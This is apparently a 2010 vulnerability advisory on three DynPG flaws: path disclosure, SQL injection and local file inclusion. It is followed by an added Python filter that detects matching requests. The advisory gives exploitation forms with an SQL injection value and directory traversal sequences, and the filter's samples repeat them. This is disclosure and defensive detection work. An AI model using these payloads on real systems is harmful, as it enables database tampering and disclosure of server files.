htbridge | High-Tech Bridge | HTB22701
History: Nov 16, 2010 - 12:00 a.m.

Multiple Vulnerabilities in DynPG

2010-11-16 00:00:00
High-Tech Bridge
www.htbridge.com
EPSS: 0.038
Percentile: 92.0%

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in DynPG which could be exploited to perform SQL injection attacks, disclose potentially sensitive information and compromise a vulnerable system.

  1. Installation path disclosure weakness in DynPG: CVE-2010-4401
    The weakness was found in the languages.inc.php script. A remote attacker can learn the application's installation folder by directly accessing the vulnerable script.
    Exploitation example:
    http://[host]/languages.inc.php

  2. SQL injection vulnerabilities in DynPG: CVE-2010-4400
    The vulnerability exists due to input sanitization errors in the “giveRights_UserId” parameter in _rights.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
    Exploitation example:
    <form action="http://[host]/_rights.php" method="post" name="main">
    <input type="hidden" name="saveRights" value="1" />
    <input type="hidden" name="giveRights_giveright" value="1" />
    <input type="hidden" name="giveRights_UserId" value="123'SQL_CODE_HERE" />
    <input type="submit" value="submit" name="submit" />
    </form>

  3. Local file inclusion vulnerability in DynPG: CVE-2010-4399
    Input passed to the “CHG_DYNPG_SET_LANGUAGE” variable in index.php is not properly sanitized before being used to include local files. A remote attacker can include arbitrary files on the target system using directory traversal sequences.
    Exploitation example:
    <form action="http://[host]/index.php" method="post" name="main">
    <input type="hidden" name="SYSTEM_NAME" value="[admin_login]" />
    <input type="hidden" name="SYSTEM_PASSWORD" value="[admin_password]" />
    <input type="hidden" name="SET_LANGUAGE" value="1" />
    <input type="hidden" name="CHG_DYNPG_SET_LANGUAGE" value="../../../../../" />
    <input type="submit" value="submit" name="submit" />
    </form>
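
As an added example (not part of the High-Tech Bridge advisory or of DynPG's code), the following Python check flags HTTP requests that match the three issues above, for use in a filtering proxy or when reviewing recorded requests. The allowlist patterns for legitimate `giveRights_UserId` and `CHG_DYNPG_SET_LANGUAGE` values, the names `check_request`, `PARAM_RULES` and `DIRECT_ACCESS`, and the host `cms.example` are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# (script, POST parameter, allowlist pattern, CVE): names come from the advisory.
# The allowlist patterns are assumptions about what legitimate values look like.
PARAM_RULES = [
    ("_rights.php", "giveRights_UserId", re.compile(r"[0-9]{1,10}"), "CVE-2010-4400"),
    ("index.php", "CHG_DYNPG_SET_LANGUAGE", re.compile(r"[A-Za-z0-9_-]{1,32}"), "CVE-2010-4399"),
]
DIRECT_ACCESS = ("languages.inc.php", "CVE-2010-4401")


def check_request(method, url, body=""):
    """Return a sorted list of CVE ids whose pattern the request matches."""
    script = urlsplit(url).path.rsplit("/", 1)[-1]  # works for sub-directory installs
    hits = set()
    if script == DIRECT_ACCESS[0]:
        hits.add(DIRECT_ACCESS[1])  # include file requested directly
    if method.upper() == "POST":
        # parse_qs URL-decodes once and keeps every value of a repeated field
        fields = parse_qs(body)
        for rule_script, param, allowed, cve in PARAM_RULES:
            if script != rule_script:
                continue
            for value in fields.get(param, []):
                if not allowed.fullmatch(value):  # anything outside the allowlist
                    hits.add(cve)
    return sorted(hits)


# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("GET", "http://cms.example/languages.inc.php", ""),
    ("POST", "http://cms.example/_rights.php", "saveRights=1&giveRights_UserId=123%27SQL_CODE_HERE"),
    ("POST", "http://cms.example/_rights.php", "saveRights=1&giveRights_UserId=123"),
    ("POST", "http://cms.example/dynpg/index.php", "SET_LANGUAGE=1&CHG_DYNPG_SET_LANGUAGE=%2e%2e%2f%2e%2e%2f"),
    ("POST", "http://cms.example/index.php", "SET_LANGUAGE=1&CHG_DYNPG_SET_LANGUAGE=english"),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, url, check_request(method, url, body) or "clean")
```

Because the check is an allowlist applied after one round of URL decoding, double-encoded values and repeated fields are flagged as well, since a leftover `%` or any non-matching duplicate fails the pattern.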
